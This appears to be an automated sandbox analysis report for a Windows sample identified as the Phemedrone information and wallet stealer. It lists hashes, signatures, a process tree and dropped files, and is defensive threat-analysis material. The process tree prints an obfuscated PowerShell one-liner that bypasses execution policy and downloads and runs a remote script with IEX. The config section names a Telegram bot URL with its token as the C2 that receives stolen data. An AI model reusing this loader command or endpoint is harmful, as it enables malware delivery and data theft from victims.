Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04-11-2024 08:35

General

  • Target

    86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe

  • Size

    14.2MB

  • MD5

    c5d36c7404a03ec6df8024737d97a0c8

  • SHA1

    9a213e487337376c38e0cfdac240dc6ffb5fdc1e

  • SHA256

    86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354

  • SHA512

    812a21f479c56716d892df32a1f910b41310f74de13641d93654a0a722705fb90e114081f2af2ef8c4717febb05715183c0d6deb36bb135f819553c9a9e49216

  • SSDEEP

    196608:MUehdkSzJ4bvuLE5rUSW9rWWsPbWIBMWRlHbLVb4zH:M94x5r1CrWWsTWIfN8

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument

Signatures

  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
    "C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Windows\system32\cmd.exe
        cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Windows\system32\cmd.exe
          cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5076
            • C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe
              "C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe" -pkek -aoa -y
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3008

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cr5ljjvv.ogd.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe

    Filesize

    246KB

    MD5

    bcb323eb0cfd10d58cf134bc7bdc8d67

    SHA1

    c34a8c428b715b67b696819fc1d172708a23d3f3

    SHA256

    6d1a5864d641f2da852bfced96a305a41b6464dc12a944883985a4c305a9d8c3

    SHA512

    bac5411c794a1b473b628c5b261bef5a830a6fed5a797c785ac3f3370def8f91db2368db8ea13d91ece0b89ab6109b64e3ecddcd27d15b2d7cc6f29216a57255

  • memory/3008-27-0x0000014EC8F70000-0x0000014EC8FB4000-memory.dmp

    Filesize

    272KB

  • memory/5076-0-0x00007FFDBF0C3000-0x00007FFDBF0C5000-memory.dmp

    Filesize

    8KB

  • memory/5076-1-0x00000226ED500000-0x00000226ED522000-memory.dmp

    Filesize

    136KB

  • memory/5076-11-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-12-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-13-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-14-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-28-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-29-0x00007FFDBF0C3000-0x00007FFDBF0C5000-memory.dmp

    Filesize

    8KB

  • memory/5076-32-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB